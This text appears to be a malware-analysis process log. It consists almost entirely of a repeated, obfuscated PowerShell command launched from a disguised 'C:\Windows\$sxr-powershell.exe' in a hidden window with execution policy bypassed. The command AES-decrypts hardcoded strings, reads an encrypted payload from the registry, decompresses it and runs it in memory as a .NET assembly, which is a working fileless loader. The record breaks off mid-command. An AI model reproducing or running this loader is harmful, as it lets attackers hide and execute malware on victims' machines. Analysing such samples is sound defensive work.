[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:4864

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:4836

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:4752

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object 